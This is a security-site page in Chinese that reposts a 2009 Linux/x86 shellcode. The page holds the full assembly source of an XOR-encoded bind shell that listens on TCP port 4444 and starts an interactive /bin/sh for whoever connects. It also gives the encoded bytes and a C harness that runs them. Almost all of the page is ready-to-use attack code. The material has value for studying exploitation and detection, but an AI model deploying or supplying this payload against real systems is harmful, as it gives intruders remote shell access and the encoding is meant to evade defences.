首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes
来源:rick2600@hotmail.com 作者:Rick 发布时间:2009-07-13  

/*
       Author: Rick
       Email: rick2600@hotmail.com

       OS: Linux/x86
       Description: Port Bind 4444 ( xor-encoded )


--------------------------------------------------------------------
section .text
    global _start

_start:

    ;socket (PF_INET, SOCK_STREAM, 0)
    push byte 0x66     
    pop eax
    push byte 0x01
    pop ebx
    xor ecx, ecx
    push ecx
    push byte 0x01
    push byte 0x02
    mov ecx, esp
    int 0x80
   
    mov esi, eax ;save file descriptor
   
    ;bind (sockfd, server, len)
    xor edx, edx
    push edx
    push word 0x5c11
    push word 0x02
    mov ecx, esp
    push byte 0x10
    push ecx
    push eax
    mov ecx, esp
    mov bl, 0x02
    push byte 0x66
    pop eax
    int 0x80
   
    ;listen
    mov al, 0x66
    mov bl, 0x04
    int 0x80
   
    ;accept
    push edx
    push esi
    mov ecx, esp
    inc ebx
    push byte 0x66
    pop eax
    int 0x80
   
    mov ebx, eax ;save file descriptor
   
    ;dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0)
    push byte 0x02
    pop ecx
    do_dup:
        push byte 0x3f
        pop eax
        int 0x80
    loop do_dup
        push byte 0x3f
        pop eax
        int 0x80
   
   
    ; execve ("/bin/sh", ["/bin/sh", "-i"], 0);
    xor edx, edx
    push edx
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    push edx
    push word 0x692d
    mov ecx, esp
    push edx
    push ecx
    push ebx
    mov ecx, esp
    push byte 0x0b
    pop eax
    int 0x80
   
    ;exit(0)
    push byte 0x01
    pop eax
    xor ebx, ebx
    int 0x80
--------------------------------------------------------------------
*/
                       
#include <stdio.h>
#include <string.h>

 

char code[] =
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
"\xd3\x9e";

 

int main(void)
{
   printf("length: %d\n", strlen(code));
  
   void (*shellcode)();
   shellcode = (void *)code;
   shellcode();
   return (0);
   
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AwingSoft Web3D Player (WindsP
·Morcego CMS <= 1.7.6 Remote Bl
·eEye Retina WiFi Security Scan
·M3U/M3L to ASX/WPL 1.1 (ASX,M
·OtsAv DJ/TV/Radio Multiple Loc
·Playlistmaker 1.5 (.M3U/M3L/T
·ToyLog 0.1 SQL Injection Vulne
·d.net CMS Arbitrary Reinstall/
·MS Internet Explorer 7 Video A
·Pirch IRC 98 Client (response)
·Photo DVD Maker Pro <= 8.02 (.
·Photo DVD Maker Pro versions 8
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved